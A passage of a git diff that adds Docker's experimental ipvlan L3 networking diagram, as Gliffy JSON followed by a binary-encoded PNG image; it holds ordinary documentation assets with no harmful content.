Day","shape":{"primary":{"strokeWidth":2,"strokeColor":"#00A4DA","fillColor":"#AEE4F4","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#004257"}},"secondary":{"strokeWidth":2,"strokeColor":"#CDB25E","fillColor":"#EACF81","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#332D1A"}},"tertiary":{"strokeWidth":2,"strokeColor":"#FFBE00","fillColor":"#FFF1CB","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#000000"}},"highlight":{"strokeWidth":2,"strokeColor":"#00A4DA","fillColor":"#00A4DA","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#ffffff"}}},"line":{"strokeWidth":2,"strokeColor":"#00A4DA","fillColor":"none","arrowType":2,"interpolationType":"quadratic","cornerRadius":0,"text":{"color":"#002248"}},"text":{"color":"#002248"},"stage":{"color":"#FFFFFF"}},"viewportType":"default","fitBB":{"min":{"x":9,"y":10.461511948529278},"max":{"x":447,"y":421.5}},"printModel":{"pageSize":"a4","portrait":false,"fitToOnePage":false,"displayPageBreaks":false},"objects":[{"x":12.0,"y":200.0,"rotation":0.0,"id":276,"width":434.00000000000006,"height":197.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":10,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":2.0,"strokeColor":"#434343","fillColor":"#c5e4fc","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":0.93,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":275.0,"y":8.93295288085936,"rotation":0.0,"id":269,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":14,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":272,"py":0.5,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":290,"py":1.0,"p
x":0.7071067811865476}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#000000","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[82.0,295.5670471191406],[-4.628896294384617,211.06704711914062]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":285.0,"y":18.93295288085936,"rotation":0.0,"id":268,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":15,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":316,"py":0.5,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":290,"py":0.9999999999999996,"px":0.29289321881345254}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#000000","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-204.0,285.5670471191406],[-100.37110370561533,201.06704711914062]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":8.0,"y":203.5,"rotation":0.0,"id":267,"width":116.0,"height":16.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":16,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Docker Host

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":10.0,"y":28.93295288085936,"rotation":0.0,"id":278,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":17,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":290,"py":0.5,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":246,"py":0.5,"px":0.5}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#000000","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[217.5,167.06704711914062],[219.11774189711457,53.02855906766992]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":57.51435447730654,"y":10.461511948529278,"rotation":0.0,"id":246,"width":343.20677483961606,"height":143.0,"uid":"com.gliffy.shape.cisco.cisco_v1.storage.cloud","order":18,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.cisco.cisco_v1.storage.cloud","strokeWidth":2.0,"strokeColor":"#333333","fillColor":"#434343","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":106.0,"y":55.19999694824217,"rotation":0.0,"id":262,"width":262.0,"height":75.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":22,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":nul
l,"html":"

Unless notified about the container networks, the physical network does not have a route to their subnets

Who has 10.16.20.0/24?

Who has 10.1.20.0/24?

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":7.0,"y":403.5,"rotation":0.0,"id":282,"width":442.0,"height":18.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":23,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Containers can be on different subnets and reach each other

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":106.0,"y":252.5,"rotation":0.0,"id":288,"width":238.0,"height":22.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":24,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

 Ipvlan L3 Mode

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":124.0,"y":172.0,"rotation":0.0,"id":290,"width":207.0,"height":48.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":25,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#cccccc","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":1.0,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[{"x":3.568965517241383,"y":0.0,"rotation":0.0,"id":291,"width":199.86206896551747,"height":42.0,"uid":null,"order":27,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":8,"paddingRight":8,"paddingBottom":8,"paddingLeft":8,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Eth0

192.168.50.10/24

Parent interface acts as a Router

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":29.0,"y":358.1999969482422,"rotation":0.0,"id":304,"width":390.99999999999994,"height":32.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":29,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

All containers can ping each other without a router if

they share the same parent interface (example eth0)

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":24.0,"y":276.0,"rotation":0.0,"id":320,"width":134.0,"height":77.0,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":48,"lockAspectRatio":false,"lockShape":false,"children":[{"x":0.0,"y":0.0,"rotation":0.0,"id":316,"width":114.0,"height":57.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":44,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":0.97,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[{"x":2.279999999999999,"y":0.0,"rotation":0.0,"id":317,"width":109.44000000000001,"height":43.0,"uid":null,"order":47,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":8,"paddingRight":8,"paddingBottom":8,"paddingLeft":8,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Container(s)

Eth0 

172.16.20.x/24

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":10.0,"y":10.0,"rotation":0.0,"id":318,"width":114.0,"height":57.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":42,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":0.97,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":20.0,"y":20.0,"rotation":0.0,"id":319,"width":114.0,"height":57.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":40,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":0.97,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":300.0,"y":276.0,"rotation":0.0,"id":321,"width":134.0,"height":77.0,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":49,"lockAspectRatio":false,"lockShape":false,"children":[{"x":0.0,"y":0.0,"rotation":0.0,"id":272,"width":114.0,"height":57.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":35,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":0.97,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[{"x":2.279999999999999,"y":0.0,"rotation":0.0,"id":273,"width":109.44000000000001,"height":44.0,"uid":null,"orde
r":38,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":8,"paddingRight":8,"paddingBottom":8,"paddingLeft":8,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Container(s)

Eth0 10.1.20.x/24

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":10.0,"y":10.0,"rotation":0.0,"id":310,"width":114.0,"height":57.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":33,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":0.97,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":20.0,"y":20.0,"rotation":0.0,"id":312,"width":114.0,"height":57.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":31,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":0.97,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":368.0,"y":85.93295288085938,"rotation":0.0,"id":322,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":50,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#434343","fillColor":"none","dashStyle":"4.0,4.0","startArrow":2,"endArrow":2,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-191.0,222.06704711914062],[-80.9272967534639,222.06704711914062]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":167.0,"y":25.499999999999986,"rotation":0.0,"id":323,"width":135.0,"height":32.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":51,"lockAspec
tRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Physical Network

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"layers":[{"guid":"9wom3rMkTrb3","order":0,"name":"Layer 0","active":true,"locked":false,"visible":true,"nodeIndex":53}],"shapeStyles":{},"lineStyles":{"global":{"fill":"none","stroke":"#434343","strokeWidth":2,"dashStyle":"4.0,4.0","startArrow":2,"endArrow":2,"orthoMode":2}},"textStyles":{"global":{"face":"Arial","size":"13px","color":"#000000"}}},"metadata":{"title":"untitled","revision":0,"exportBorder":false,"loadPosition":"default","libraries":["com.gliffy.libraries.basic.basic_v1.default","com.gliffy.libraries.flowchart.flowchart_v1.default","com.gliffy.libraries.swimlanes.swimlanes_v1.default","com.gliffy.libraries.images","com.gliffy.libraries.network.network_v4.home","com.gliffy.libraries.network.network_v4.business","com.gliffy.libraries.network.network_v4.rack","com.gliffy.libraries.network.network_v3.home","com.gliffy.libraries.network.network_v3.business","com.gliffy.libraries.network.network_v3.rack"],"lastSerialized":1458117032939,"analyticsProduct":"Confluence"},"embeddedResources":{"index":0,"resources":[]}} \ No newline at end of file diff --git a/vendor/github.com/docker/docker/experimental/images/ipvlan-l3.png b/vendor/github.com/docker/docker/experimental/images/ipvlan-l3.png new file mode 100644 index 0000000000000000000000000000000000000000..3227a83ca1541ec68e06b0aa105e22fdf5ae9e6f GIT binary patch literal 18260 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 